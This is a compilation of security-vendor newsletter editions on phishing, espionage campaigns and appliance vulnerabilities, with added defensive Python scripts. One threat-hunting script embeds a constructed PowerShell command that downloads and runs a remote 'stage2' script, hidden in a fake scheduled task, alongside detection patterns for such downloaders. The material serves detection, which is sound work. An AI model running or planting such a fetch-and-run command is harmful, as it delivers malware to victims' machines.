This Week in Cybersecurity (TWiC): Medical Devices, Phishing, and Espionage

Welcome to this week’s cybersecurity advisory, where we expose the most pressing cyber threats targeting industries worldwide. This edition uncovers major vulnerabilities in medical monitors, a new wave of Microsoft 365 phishing attacks, North Korean cyber espionage tactics, and the hijacking of Signal accounts through malicious QR codes. Here’s what you need to know:

Medical Monitors Contain Embedded Security Risks

The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Food and Drug Administration (FDA) recently issued an alert regarding Contec CMS8000 and Epsimed MN-120 patient monitors. The devices, which track vital signs such as heart rate and oxygen saturation, were initially thought to contain a hidden backdoor. However, cybersecurity researchers have since determined that the issue stems from insecure design rather than intentional malware.

Risks Identified:

  • Unauthorized remote access and control of the device.
  • Potential lateral movement within hospital networks.
  • Possible exfiltration of protected health information (PHI).

Security Recommendations:

Russian Threat Actors Exploit Microsoft 365 with Device Code Phishing

Security researchers at Volexity and Microsoft warn that Russian state-backed actors are targeting Microsoft 365 accounts with a technique called device code phishing. The technique abuses the OAuth 2.0 device authorization grant, a legitimate sign-in flow built for input-constrained devices such as smart TVs and printers: the device displays a short code, the user enters that code in a browser on another device, and the requesting device then receives tokens for the user’s account.

Attackers masquerade as trusted entities, such as the U.S. Department of State or the Ukrainian Ministry of Defense, to lure victims into entering an attacker-generated code at Microsoft’s legitimate device-login page. Because the attacker requested the code, the resulting access and refresh tokens are issued to the attacker’s client, giving persistent access to the victim’s Microsoft 365 account without the victim ever typing a password into a lookalike site.
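
To make this concrete, here is an added example (not code from Volexity, Microsoft, or this advisory) that flags device-code sign-ins in a Microsoft Entra sign-in log export. It assumes the Microsoft Graph signIn record layout, where authenticationProtocol is "deviceCode" for the device authorization grant; the sample records, the trusted address ranges, and the list of apps expected to use the grant are all constructed placeholders to tune for your tenant.

```python
"""Flag OAuth device-code sign-ins in a Microsoft Entra sign-in log export.

Added example for this advisory; it is not code from Volexity, Microsoft or
the original page. It assumes the Microsoft Graph `signIn` record layout,
where `authenticationProtocol` is "deviceCode" for the device authorization
grant. The records below are constructed for illustration; the trusted
address ranges and expected-app list are placeholders for your tenant.
"""
import json

# Constructed sample export, one JSON record per line (not real telemetry).
SAMPLE_SIGNINS = """
{"createdDateTime": "2025-02-12T09:01:10Z", "userPrincipalName": "alice@example.org", "authenticationProtocol": "oAuth2", "ipAddress": "203.0.113.10", "appDisplayName": "Outlook", "conditionalAccessStatus": "success"}
{"createdDateTime": "2025-02-12T09:03:44Z", "userPrincipalName": "alice@example.org", "authenticationProtocol": "deviceCode", "ipAddress": "198.51.100.77", "appDisplayName": "Microsoft Authentication Broker", "conditionalAccessStatus": "notApplied"}
{"createdDateTime": "2025-02-12T11:20:00Z", "userPrincipalName": "bob@example.org", "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.22", "appDisplayName": "Microsoft Azure CLI", "conditionalAccessStatus": "success"}
{"createdDateTime": "2025-02-12T12:00:00Z", "userPrincipalName": "carol@example.org", "authenticationProtocol": "ropc", "ipAddress": "203.0.113.30", "appDisplayName": "Legacy Sync", "conditionalAccessStatus": "notApplied"}
"""

# Placeholder egress range (TEST-NET-3); replace with your own named locations.
TRUSTED_PREFIXES = ("203.0.113.",)

# Apps that legitimately use the device-code grant in many tenants (assumption;
# tune to what your administrators actually use).
EXPECTED_DEVICE_CODE_APPS = {"Microsoft Azure CLI", "Azure PowerShell"}


def parse_signins(text):
    """Parse a newline-delimited JSON export into a list of dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def device_code_alerts(records, trusted_prefixes=TRUSTED_PREFIXES):
    """Return one alert per device-code sign-in with its risk indicators.

    Every device-code sign-in is surfaced (the grant should be rare in a
    tenant); three indicators raise severity: an IP outside the trusted
    ranges, an app that does not normally use the grant, and a sign-in that
    no Conditional Access policy evaluated.
    """
    alerts = []
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            continue
        indicators = []
        if not r.get("ipAddress", "").startswith(trusted_prefixes):
            indicators.append("untrusted_ip")
        if r.get("appDisplayName") not in EXPECTED_DEVICE_CODE_APPS:
            indicators.append("unexpected_app")
        if r.get("conditionalAccessStatus") != "success":
            indicators.append("no_ca_policy_applied")
        severity = "high" if len(indicators) >= 2 else "medium" if indicators else "low"
        alerts.append({
            "time": r["createdDateTime"],
            "user": r["userPrincipalName"],
            "ip": r.get("ipAddress"),
            "app": r.get("appDisplayName"),
            "indicators": indicators,
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for a in device_code_alerts(parse_signins(SAMPLE_SIGNINS)):
        print(f"[{a['severity']}] {a['time']} {a['user']} from {a['ip']} via {a['app']}: {a['indicators']}")
```

Every device-code sign-in is worth a look because the grant is rare in most tenants; the indicators only order the queue. Where your Conditional Access policies can target the device code flow as an authentication flow, blocking it outright for users who have no need for it removes the problem rather than detecting it after the fact.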

Mitigation Measures:

North Korean APT Exploits PowerShell and Dropbox for Cyber Espionage

Researchers have uncovered a sophisticated cyber espionage operation, DEEP#DRIVE, attributed to North Korea’s Kimsuky group (APT43). The campaign targets South Korean government agencies, businesses, and cryptocurrency users with phishing emails whose attachments launch malicious PowerShell scripts that pull further stages from Dropbox.

Threat Tactics:

  • Malicious Windows shortcut (.LNK) files initiate payload execution.
  • PowerShell scripts retrieve additional malware from Dropbox.
  • A scheduled task maintains persistence and exfiltrates sensitive data.

Defensive Actions:

  • Organizations should restrict PowerShell script execution and implement application control policies.
  • Cloud storage access should be monitored for unauthorized API activity.
  • Security awareness training must emphasize phishing lures disguised as document files.
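
As an added example (not code from the DEEP#DRIVE research or this newsletter), the script below hunts for the persistence pattern described above in scheduled-task definitions exported with schtasks /query /xml: it decodes any -EncodedCommand payload and flags PowerShell actions that combine hidden-window or bypass switches with download cues or cloud-storage hosts. The task definitions are constructed, and the cloud-storage hostnames are an assumption to tune for your environment.

```python
"""Hunt for PowerShell-based persistence in exported scheduled-task XML.

Added example for this newsletter, not code from the DEEP#DRIVE research or
the original page. It parses the XML that `schtasks /query /xml` emits for a
task, decodes any -EncodedCommand payload (base64 of UTF-16LE text), and
flags actions that combine PowerShell with hidden-window, bypass or download
behaviour. The task definitions below are constructed; the cloud-storage
hostnames are an assumption to tune locally.
"""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed stage-2 downloader, encoded the way -EncodedCommand expects it.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://dl.dropboxusercontent.com/s/example/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(_STAGE2.encode("utf-16le")).decode()

# Constructed task exports keyed by task path (not real tasks).
SAMPLE_TASKS = {
    "\\Microsoft\\Windows\\UpdateCheck": f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {ENCODED_STAGE2}</Arguments>
    </Exec>
  </Actions>
</Task>""",
    "\\Backup\\NightlyReport": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-File C:\\Scripts\\report.ps1</Arguments>
    </Exec>
  </Actions>
</Task>""",
}

SUSPICIOUS_ARGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-ex(?:ecutionpolicy)?\s+bypass|-noni(?:nteractive)?\b",
    re.IGNORECASE,
)
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
# Assumption: cloud-storage hosts your organisation does not use for automation.
CLOUD_STORAGE_HOSTS = re.compile(r"dropbox(?:usercontent)?\.com|api\.dropboxapi\.com", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(arguments):
    """Return the decoded -EncodedCommand script, or None when absent or invalid."""
    m = ENCODED_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_task_actions(xml_text):
    """Yield (command, arguments) for each <Exec> action in one task definition."""
    # Exports are UTF-16 on disk; once decoded to str, drop the declaration before parsing.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    for exec_node in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
        yield cmd, args


def triage_task(name, xml_text):
    """Return a hit dict (indicators plus decoded payload) for a suspicious task, else None."""
    for cmd, args in parse_task_actions(xml_text):
        if not re.search(r"powershell|pwsh", cmd, re.IGNORECASE):
            continue
        decoded = decode_encoded_command(args)
        effective = args + " " + (decoded or "")   # inspect the decoded script too
        indicators = []
        if SUSPICIOUS_ARGS.search(args):
            indicators.append("evasive_switches")
        if decoded is not None:
            indicators.append("encoded_command")
        if DOWNLOAD_CUES.search(effective):
            indicators.append("downloader")
        if CLOUD_STORAGE_HOSTS.search(effective):
            indicators.append("cloud_storage_c2")
        if indicators:
            return {"task": name, "indicators": indicators, "decoded": decoded}
    return None


def hunt(tasks):
    """Run triage over a {task_path: xml_text} mapping and return the hits."""
    return [hit for name, xml in tasks.items() if (hit := triage_task(name, xml))]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_TASKS):
        print(hit["task"], hit["indicators"])
        print("  decoded:", hit["decoded"])
```

Decoding the encoded command before matching is the step that matters: the visible arguments of a task like this often contain nothing more telling than a hidden-window switch, and the download URL only appears in the decoded script. The same triage can be run against the XML of every task under C:\Windows\System32\Tasks, and the indicator names map directly onto the application-control and PowerShell restrictions listed above.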

Russian Hackers Exploit Signal’s Linked Device Feature Using QR Codes

Russia-aligned cyber actors have been actively targeting Signal users through malicious QR codes, enabling them to covertly eavesdrop on encrypted communications. Google’s Threat Intelligence Group (GTIG) discovered that these attackers use phishing techniques to trick victims into scanning fraudulent QR codes, unknowingly linking their Signal accounts to adversary-controlled devices.

Key Findings:

  • Attackers disguise QR codes as legitimate Signal group invites.
  • Messages are intercepted in real-time, compromising private conversations.
  • Some campaigns use phishing pages mimicking military applications to deceive Ukrainian personnel.

Protective Measures:

  • Signal users should not scan a QR code that results in a device-linking prompt unless they started linking a device themselves; a genuine group invite never asks to link a device.
  • Organizations should deliver security awareness training and run social engineering exercises to test it.
  • Users should regularly review Signal’s Linked Devices list and unlink any device they do not recognize.

Conclusion

This week’s headlines emphasize the continued risk posed by both nation-state and financially motivated actors targeting critical infrastructure, enterprise environments, and personal communication tools. Organizations must adopt a proactive defense strategy, combining network segmentation, endpoint monitoring, phishing awareness, and access control measures to reduce evolving cyber risks.

Stay vigilant, stay secure, and follow nGuard on LinkedIn to stay on top of the latest cyber updates and insights.

TWiC | Fortinet PoC, US Airport Sites Go Offline, CISA Warns of Industrial Appliance Flaws, & Windows 11 Phishing Protection

Over the past few weeks several hot topics and time-sensitive advisories have been released. In this edition of This Week in Cybersecurity, nGuard highlights the Fortinet proof-of-concept (PoC) exploit that was released; Russian-speaking hackers taking down US airport websites; Windows 11’s automatic phishing protection; and CISA’s warning of critical flaws in some industrial appliances.

Fortinet PoC Released
Proof-of-concept (PoC) exploit code is now publicly available for the recently disclosed critical authentication bypass, CVE-2022-40684, affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager. Successful exploitation amounts to granting complete administrative access “to do just about anything” on the affected system. Fortinet issued an advisory urging customers to upgrade affected appliances to a fixed version as soon as possible, and CISA added the flaw to its Known Exploited Vulnerabilities (KEV) Catalog. As of October 13, 2022, 12 unique IP addresses accounted for most of the observed exploitation attempts, the majority located in Germany, followed by the U.S., Brazil, China, and France. nGuard covered this in more detail in a Security Advisory last week. Ongoing penetration testing and vulnerability management can alert you to vulnerabilities like this being present in your environment.

US Airport Sites Taken Down by Russian-Speaking Attackers
On Monday, October 10, more than a dozen public-facing airport websites, including those of some of the nation’s largest airports, became inaccessible, and Russian-speaking hackers claimed responsibility. The attack was carried out by Killnet, a group that supports the Kremlin but is not believed to consist of government hackers. Killnet favors distributed denial of service (DDoS) attacks. Among the affected sites were those of Atlanta’s Hartsfield-Jackson International Airport and Los Angeles International Airport. Air travel itself did not appear to be impacted, though travelers who tried to reach those sites during the outage were likely inconvenienced.

Windows 11 Offers Automatic Phishing Protection
Enhanced phishing protection is now built into Windows 11. It detects when a user types their password into an application or website that Microsoft has identified as malicious, so admins know when a password has been exposed and can act before it is reused. According to Microsoft, “When Windows 11 protects against one phishing attack, that threat intelligence cascades to protect other Windows users interacting with other apps and sites that are experiencing the same attack.” A blocking dialog prompts users to change their password if they type it into a phishing site in any Chromium-based browser or into an application connecting to a phishing site. If users try to store their password in plain text, for example in Notepad or in a Microsoft 365 app, Windows 11 warns them that this is unsafe and urges them to delete it from the file. To help train and test your employees on their security awareness, nGuard offers custom, tailored Security Awareness Training and social engineering.

CISA Publishes Two Advisories Regarding Industrial Appliances
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published two Industrial Control Systems advisories covering severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. The issues, which affect R-SeeNet versions 2.4.17 and prior, are:

Patches are available in R-SeeNet version 2.4.21, released on September 30, 2022.

These alerts come less than a week after CISA published 25 ICS advisories on October 13, 2022, spanning several vulnerabilities across devices from Siemens, Hitachi Energy, and Mitsubishi Electric.

nGuard has a wide array of experience assessing critical infrastructure, SCADA, and Industrial Control Systems (ICS) and can help you secure yours. Conducting annual penetration testing, having a proper Incident Response Plan, and ensuring you have the proper logging, alerting, and correlation can help you stay ahead of the attackers.

URGENT | Fortinet Authentication Bypass Vulnerability

On October 10, 2022, Fortinet released a new advisory for CVE-2022-40684, which affects the FortiOS, FortiProxy, and FortiSwitchManager products.

Each of these products is affected by an authentication bypass on the administrative interface that lets an unauthenticated attacker perform actions on the target system. These actions include, but are not limited to:

  • Modifying admin user SSH keys.
  • Adding new local users.
  • Updating network configurations to reroute traffic.
  • Initiating packet captures to capture sensitive information.

Public exploit code has begun to circulate.

Affected Products

  • FortiOS version 7.2.0 through 7.2.1
  • FortiOS version 7.0.0 through 7.0.6
  • FortiProxy version 7.2.0
  • FortiProxy version 7.0.0 through 7.0.6
  • FortiSwitchManager version 7.2.0
  • FortiSwitchManager version 7.0.0

Solutions

  • Upgrade to FortiOS version 7.2.2 or above
  • Upgrade to FortiOS version 7.0.7 or above
  • Upgrade to FortiProxy version 7.2.1 or above
  • Upgrade to FortiProxy version 7.0.7 or above
  • Upgrade to FortiSwitchManager version 7.2.1 or above
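
An added example (not Fortinet tooling or code from this advisory) that checks a device inventory against the affected ranges listed above; the inventory is constructed. It compares versions as integer tuples, so 7.0.10 is correctly treated as newer than 7.0.7, which a plain string comparison would get wrong.

```python
"""Check a Fortinet inventory against the CVE-2022-40684 affected ranges.

Added example for this advisory; it is not Fortinet tooling or code from
the page. The affected and fixed versions are the ones listed above; the
inventory below is constructed. Versions are compared as integer tuples so
that 7.0.10 sorts after 7.0.7, the usual mistake in ad-hoc version checks.
"""

# (product, first affected, last affected, first fixed build), from the advisory.
AFFECTED_RANGES = [
    ("FortiOS",            (7, 2, 0), (7, 2, 1), (7, 2, 2)),
    ("FortiOS",            (7, 0, 0), (7, 0, 6), (7, 0, 7)),
    ("FortiProxy",         (7, 2, 0), (7, 2, 0), (7, 2, 1)),
    ("FortiProxy",         (7, 0, 0), (7, 0, 6), (7, 0, 7)),
    ("FortiSwitchManager", (7, 2, 0), (7, 2, 0), (7, 2, 1)),
    ("FortiSwitchManager", (7, 0, 0), (7, 0, 0), (7, 2, 1)),  # no 7.0.x fix listed; move to 7.2.1
]

# Constructed inventory (hostnames and versions are illustrative).
INVENTORY = [
    {"host": "fw-edge-01",   "product": "FortiOS",            "version": "7.0.3"},
    {"host": "fw-edge-02",   "product": "FortiOS",            "version": "7.0.10"},
    {"host": "fw-branch-07", "product": "FortiOS",            "version": "6.4.9"},
    {"host": "proxy-01",     "product": "FortiProxy",         "version": "7.2.0"},
    {"host": "fsm-01",       "product": "FortiSwitchManager", "version": "7.0.0"},
]


def parse_version(text):
    """'7.0.10' -> (7, 0, 10). Raises ValueError for anything that is not major.minor.patch."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 3:
        raise ValueError(f"unexpected version format: {text!r}")
    return parts


def assess(product, version):
    """Return (status, recommended_version) for one device.

    status is 'vulnerable' (inside an affected range), 'fixed' (same release
    branch, past the last affected build) or 'not_affected' (a branch the
    advisory does not list, such as 6.4.x).
    """
    v = parse_version(version)
    for prod, lo, hi, fix in AFFECTED_RANGES:
        if prod != product:
            continue
        if lo <= v <= hi:
            return "vulnerable", ".".join(map(str, fix))
        if v[:2] == lo[:2] and v > hi:
            return "fixed", None
    return "not_affected", None


def vulnerable_hosts(inventory):
    """Filter an inventory down to devices that still need the upgrade."""
    hits = []
    for item in inventory:
        status, fix = assess(item["product"], item["version"])
        if status == "vulnerable":
            hits.append((item["host"], item["product"], item["version"], fix))
    return hits


if __name__ == "__main__":
    for host, product, version, fix in vulnerable_hosts(INVENTORY):
        print(f"{host}: {product} {version} -> upgrade to {fix} or later")
```

Feed it the product and version from each appliance (for example from your asset inventory or the output of your vulnerability scanner) and it returns only the devices that still need the upgrade, with the target build from the advisory.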

Read more in:

Ongoing penetration testing and vulnerability management can alert you to these types of vulnerabilities being present in your environment. nGuard account executives are standing by to discuss solutions that elevate the overall security posture of your organization and ensure you are ready to handle vulnerabilities such as the ones described above.

TWiC | This Week in Cybersecurity – Let’s Go Phishing 🎣

Over the past week there have been many hot topics in cybersecurity. This edition of This Week in Cybersecurity includes stories focused on the latest in phishing campaigns tactics, techniques, procedures, common use cases, and infrastructure being used. Check out the details below.

  • Phishing Attacks Skyrocket with Microsoft and Facebook as Most Abused Brands

    According to a report from researchers at Vade, phishing attempts abusing the Microsoft brand rose 266 percent in the first quarter of 2022 compared with the same period a year earlier, and fake Facebook messages rose 177 percent in the second quarter of 2022. Attackers are ramping up their use of messages impersonating well-known companies, fueling a resurgence in phishing volume. The report names Microsoft, Facebook, and the French bank Crédit Agricole as the three most frequently impersonated companies, with WhatsApp, the French telecommunications provider Orange, Apple, Google, and PayPal also among the top brands abused.
  • DUCKTAIL Malware Targeting HR Professionals Through LinkedIn Spear-phishing Campaign

    Security researchers have identified an ongoing operation known as DUCKTAIL that aims to take over the Facebook Business accounts a company uses to manage its advertising. DUCKTAIL relies on an information-stealing malware component, which sets it apart from earlier campaigns that merely used Facebook as a base of operations. The malware steals session cookies from the victim’s browser and replays them to ride authenticated Facebook sessions, giving the attackers access to every Facebook Business account the victim can reach, including those with restricted access. DUCKTAIL operators use LinkedIn to identify potential targets for these campaigns.
  • 1,000s of Phishing Attacks Blast Off from InterPlanetary File System

    The InterPlanetary File System (IPFS), a distributed peer-to-peer file system, has become a hotbed for hosting phishing sites, and thousands of emails carrying IPFS phishing URLs are landing in corporate inboxes. Because IPFS addresses content by hash and serves it over peer-to-peer (P2P) connections rather than from a fixed host and path, a phishing page stays reachable through any public gateway even after one gateway or host takes it down. Phishers may move on to even more resilient hosting techniques, such as using distributed hash tables to replicate sites. As one anti-phishing expert put it, security admins need to educate themselves and their staff about how IPFS works.
  • Evilnum APT Hackers Group Attack Windows Using Weaponized Word Documents

    The APT group Evilnum has been targeting European banking and investment organizations. Its recent tactics, techniques, and procedures include spear-phishing emails carrying Microsoft Word, ISO, and Windows shortcut (LNK) attachments. Researchers also found other variations of the campaign in late 2022, including ones that used financially themed lures to get victims to open malicious ZIP archives containing .LNK files. In mid-2022 the Word document delivery method changed again to add a mechanism that connects to an attacker-controlled domain and retrieves a remote template.
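
Returning to the IPFS item above, this added example (not code from the page or from the research it summarizes) pulls IPFS gateway URLs out of a message body and extracts the content identifier (CID). It assumes the two common gateway URL shapes, path style (https://<gateway>/ipfs/<CID>/...) and subdomain style (https://<CID>.ipfs.<gateway>/...); the sample email body is constructed.

```python
"""Spot IPFS-hosted links in email bodies and pull out the content identifier.

Added example for this edition, not code from the page or the research it
summarises. It recognises the two common gateway shapes: path style
(https://<gateway>/ipfs/<CID>/...) and subdomain style
(https://<CID>.ipfs.<gateway>/...). The sample message body is constructed.
"""
import re
from urllib.parse import urlparse

# Constructed sample message body (not a real phishing email).
SAMPLE_BODY = """
Your mailbox is over quota. Review the pending messages here:
https://ipfs.io/ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG/login.html?u=alice
Alternative link: https://bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi.ipfs.dweb.link/
Unsubscribe: https://www.example.org/unsubscribe
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# CIDv0: 46 base58 characters starting with "Qm". CIDv1 as used in subdomain
# gateways: lowercase base32, starting with "b" (the multibase prefix).
CID_RE = re.compile(r"^(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{50,})$")


def extract_ipfs_refs(text):
    """Return [(url, cid, gateway_host, form)] for every IPFS gateway URL in text."""
    refs = []
    for url in URL_RE.findall(text):
        u = urlparse(url)
        host = u.hostname or ""
        parts = u.path.split("/")
        # Path style: /ipfs/<cid>/...
        if len(parts) > 2 and parts[1] == "ipfs" and CID_RE.match(parts[2]):
            refs.append((url, parts[2], host, "path"))
            continue
        # Subdomain style: <cid>.ipfs.<gateway>
        labels = host.split(".")
        if len(labels) >= 3 and labels[1] == "ipfs" and CID_RE.match(labels[0]):
            refs.append((url, labels[0], ".".join(labels[2:]), "subdomain"))
    return refs


def unique_cids(text):
    """The set of CIDs referenced, which is what a blocklist should key on."""
    return {cid for _, cid, _, _ in extract_ipfs_refs(text)}


if __name__ == "__main__":
    for url, cid, gateway, form in extract_ipfs_refs(SAMPLE_BODY):
        print(f"{form:9} gateway={gateway:15} cid={cid}\n          {url}")
```

Keying detections and blocklists on the CID rather than the gateway hostname is the point: the same content is reachable through any public gateway, so a hostname block is evaded by swapping gateways, while the CID identifies the phishing kit wherever it is served from.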

Stop Phishing
nGuard has been conducting social engineering assessments for almost 2 decades and has the experience and expertise to assess your users against phishing campaigns using a variety of attack methods. Using emails, phone calls, text messages, multi-factor prompt bombing attacks, fake websites, and more, nGuard can thoroughly test your security awareness training program efficacy. Contact your Account Executive or Security Consultant to learn more about how nGuard can help.

TWiC | This Week in Cybersecurity

Over the past week there have been many hot topics in cybersecurity. This edition of This Week in Cybersecurity includes stories covering Microsoft rolling back their decision to not block Office macros by default, phishing campaigns successfully bypassing multi-factor authentication (MFA), a former CIA engineer responsible for the “Vault 7 Leaks” was convicted, hackers targeting industrial control systems, and much more. Check out the details below.

  • Microsoft Rolls Back Decision To Block Office Macros By Default

    While Microsoft announced earlier this year that it would block VBA macros on downloaded documents by default, Redmond said that it will roll back this change based on “Feedback” until further notice. Microsoft’s customers were the first to notice that Microsoft rolled back this change in the Current Channel, with the old ‘Enable Editing’ or ‘Enable Content’ buttons shown at the top of downloaded Office documents with embedded macros. While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros.

  • Large-Scale Phishing Campaign Bypasses MFA

    Attackers are adapting to organizations’ growing use of MFA and building more sophisticated phishing attacks that can bypass it. “While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie – and because the session cookie shows that MFA was already used to login – the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron of KnowBe4. This adversary-in-the-middle approach is convenient for threat actors because it spares them from crafting their own phishing sites as in conventional campaigns: the proxy relays the genuine login page and captures the credentials and session cookie as they pass through. In the campaign observed by Microsoft researchers, attackers initiate contact by sending emails with an HTML file attachment to multiple recipients across different organizations. One of nGuard’s most common assessments is Social Engineering; during these assessments our engineers encounter applications that require MFA and attempt to bypass the requirement using these techniques and others, such as MFA prompt bombing.

  • Jury convicts ex-CIA engineer for leaking the agency’s “Vault7” hacking toolset

    Joshua Schulte, the former CIA engineer arrested for what’s being called the biggest theft of classified information in the agency’s history, has been convicted by a federal jury. Schulte was arrested in relation to the large cache of documents that Wikileaks had published throughout 2017. That string of CIA leaks known as “Vault 7” contained information on the tools and techniques the agency used to hack into iPhones and Android phones for overseas spying. It also had details on how the CIA broke into computers and how it turned smart TVs into listening devices. A federal jury has found Schulte guilty on nine counts, including illegally gathering national defense information and then transmitting it. As part of his closing arguments, he told the jurors that the CIA and the FBI made him a scapegoat for their embarrassing failure, repeating what his side had been saying from the time he was arrested.

  • State-backed hackers targeted US-based journalists in widespread spy campaigns

    State-sponsored hackers from China, North Korea, Iran and Turkey have been regularly spying on and impersonating journalists from various media outlets in an effort to infiltrate their networks and gain access to sensitive information, according to a report released by cybersecurity firm Proofpoint. In one of the operations, the report found that since early 2021, Chinese-backed hackers engaged in numerous phishing attacks mainly targeting U.S.-based journalists covering U.S. politics and national security. The researchers concluded their report with a warning to journalists to protect themselves and their sources because these types of attacks are likely to persist as state-sponsored hackers attempt to gather more sensitive information and manipulate public perception.

  • Hackers are targeting industrial systems with new strain of malware

    People hawking password-cracking software are targeting the hardware used in industrial-control facilities with malicious code that makes their systems part of a botnet, a researcher reported. Lost passwords happen in many organizations. A programmable logic controller — used to automate processes inside factories, electric plants, and other industrial settings, for example, may be set up and largely forgotten over the following years. When a replacement engineer later identifies a problem affecting the PLC, they may discover the now long-gone original engineer never left the passcode behind before departing the company. An entire ecosystem of malware attempts can capitalize on scenarios like this one inside industrial facilities. Online advertisements promote password crackers for PLCs and human-machine interfaces, which are the workhorses inside these environments. nGuard has a wide range of experience securing Critical Infrastructure, SCADA systems, and Industrial Controls Systems for the manufacturing industry. Our penetration testing and compliance assessments can give you the confidence in the security posture of these environments.